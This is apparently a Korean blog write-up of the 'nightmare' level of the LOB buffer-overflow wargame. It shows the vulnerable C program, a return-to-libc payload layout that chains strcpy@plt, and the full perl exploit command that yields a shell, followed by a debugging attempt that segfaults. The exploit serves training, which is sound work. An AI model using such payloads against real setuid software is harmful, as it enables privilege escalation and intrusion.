상대적으로 금방풀었네요
[succubus@localhost succubus]$ cat nightmare.c
/*
The Lord of the BOF : The Fellowship of the BOF
- nightmare
- PLT
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dumpcode.h>
main(int argc, char *argv[])
{
char buffer[40];
char *addr;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// check address
addr = (char *)&strcpy;
if(memcmp(argv[1]+44, &addr, 4) != 0){
printf("You must fall in love with strcpy()\n");
exit(0);
}
// overflow!
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// dangerous waterfall
memset(buffer+40+8, 'A', 4);
}
소스에서 ret에 strcpy@plt 를 넣는거로 봐서 rtl로 접근해야겟다 생각했습니다
[payload]
argv[1]
buf40 |SFP | &strcpy@plt | dummy | dest(buf48) |source(argv[2])
argv[2]
&system | &exit |&/bin/sh
+)&system &exit &/bin/sh &strcpy@plt 구하는건 누구나 다 할수 있으므로 생략
[succubus@localhost succubus]$ ./nightmare `perl -e 'print "a"x44,"\x10\x84\x04\x08","AAAA","\xa0\xfa\xff\xbf","\x32\xfc\xff\xbf"'` `perl -e 'print "\xe0\x8a\x05\x40","\xe0\x91\x03\x40","\xf9\xbf\x0f\x40"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa?AAAA????
bash$ my-pass
euid = 518
beg for me
&buffer +48 이랑 &argv[2] 구하는데 소스를 추가해서 구햇는데 한가지 의문이남는 부분이 있습니다
---------------------------------------------------------------------------------------------------
ex1)
[succubus@localhost /tmp]$ cat nightmare.c
/*
The Lord of the BOF : The Fellowship of the BOF
- nightmare
- PLT
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dumpcode.h>
main(int argc, char *argv[])
{
char buffer[40];
char *addr;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// check address
addr = (char *)&strcpy;
if(memcmp(argv[1]+44, &addr, 4) != 0){
printf("You must fall in love with strcpy()\n");
exit(0);
}
// overflow!
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// dangerous waterfall
memset(buffer+40+8, 'A', 4);
printf("buffer Using : %x\n",buffer);
printf("argv[2] Using : %x\n",argv[2]);
}
[succubus@localhost /tmp]$ ./nightmare `perl -e 'print "\x90"x44,"\x10\x84\x04\x08","aaaa","bbbb","cccc"'` `perl -e 'print "\xe0\x8a\x05\x40","\xe0\x91\x03\x40","\xf9\xbf\x0f\x40"'`
?????????????????????????????????????????????aaaabbbbcccc
buffer Using : bffffa70
Segmentation fault (core dumped)
'과거의 컴퓨터 공부 > LOB(完)' 카테고리의 다른 글
(LOB)level20.xavius (0) | 2014.09.02 |
---|---|
(LOB)level19.nightmare (0) | 2014.08.27 |
(LOB)level17.zombie_assassin (0) | 2014.08.25 |
(LOB)level16.assassin (0) | 2014.08.25 |
(LOB)level15.giant (0) | 2014.08.22 |